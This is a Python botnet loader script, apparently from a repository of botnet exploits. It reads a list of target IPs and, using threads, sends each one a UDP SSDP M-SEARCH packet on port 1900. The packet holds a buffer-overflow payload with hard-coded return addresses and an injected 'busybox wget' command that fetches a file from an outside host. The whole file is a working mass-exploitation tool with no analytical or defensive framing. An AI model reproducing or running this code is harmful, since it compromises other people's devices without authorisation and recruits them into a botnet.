Path: blob/master/Botnets/Exploits/IPMI/load_ipmi.py
5038 views
#! python !#1import threading, sys, time, random, socket, re, os, struct, array, requests2buffer = "\"" + "A"*140 + "\x8c\xdd\x0a\x40" + "A"*139 + "\x78\xfe\xff\xff" + "A"*16 + "\xf8\xda\x09\x40" + "A"*8 + "\xac\xb0\x0d\x40\x68\x55\x0a\x40" + "A"*108 + "sleep 1;busybox wget https://i.imger.me/8c393eaa9.gif;exit;#" + "A"*1307 + "\""3ips = open(sys.argv[1], "r").readlines()4commandpayload = "M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:uuid:schemas:device:" + buffer + ":end\r\nMan:\"ssdp:discover\"\r\nMX:3\r\n\r\n"56class netis(threading.Thread):7def __init__ (self, ip):8threading.Thread.__init__(self)9self.ip = str(ip).rstrip('\n')10def run(self):11try:12s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)13print "Attempting %s"%(self.ip)14s.sendto(commandpayload, (self.ip, 1900))15time.sleep(1)16except Exception:17pass1819for ip in ips:20try:21n = netis(ip)22n.start()23time.sleep(0.01)24except:25pass2627